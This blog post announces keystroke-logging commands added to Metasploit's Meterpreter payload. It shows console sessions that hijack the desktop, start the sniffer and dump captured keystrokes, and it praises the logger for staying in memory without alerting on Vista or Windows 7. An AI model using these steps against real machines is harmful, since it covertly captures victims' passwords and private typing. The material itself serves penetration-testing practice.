Today HD committed to the development tree of SVN bug fixes and updates to Meterpreter, among them the coolest of them all has to be the availability of keystroke logging. Now when you use Meterpreter as a payload you will get in the stdapi the ability to start Keystroke Login by running a simple set of commands. The new commands appear as follows:
Stdapi: User interface Commands===============================Command Description------- -----------grabdesktop Take over the active input desktop (needed for keyboard sniffing)idletime Returns the number of seconds the remote user has been idlekeyscan_dump Dump they keystroke bufferkeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesuictl Control some of the user interface components
The new commands are grabdesktop, keyscan_dump, keyscan_start and keyscan_stop. To start the capture of keystrokes we must firs run grabdesktop and then keyscan_start, this will start the capture of all keyboard input into memory.
meterpreter > grabdesktopTrying to hijack the input desktop...meterpreter > keyscan_startStarting the keystroke sniffer...
To dump the content of the buffer we run keyscan_dump, for this example I capture some text I typed into notepad:
meterpreter > keyscan_dumpDumping captured keystrokes...<Back> epnow this a <Back> s a killer feature!!!!!!!! <Return>meterpreter > keyscan_dumpDumping captured keystrokes...meterpreter >
Once the keystrokes are dumped they are cleared from the buffer, so save the output every time you do a dump since it will be lost. This new feature will only capture keyboard input, it will not capture clipboard content or any copy/paste activity, but it is extremely stealthy since it will only reside in memory and in my test machines with Vista with UAC enabled and on Windows 7 it did not trigger any alert. I’m anxiously looking forward on what will come next from the Metasploit team.
HD is making some changes in the code and on the names in the menu, as soon as I have a change to test and run in lab I will post an update to the post.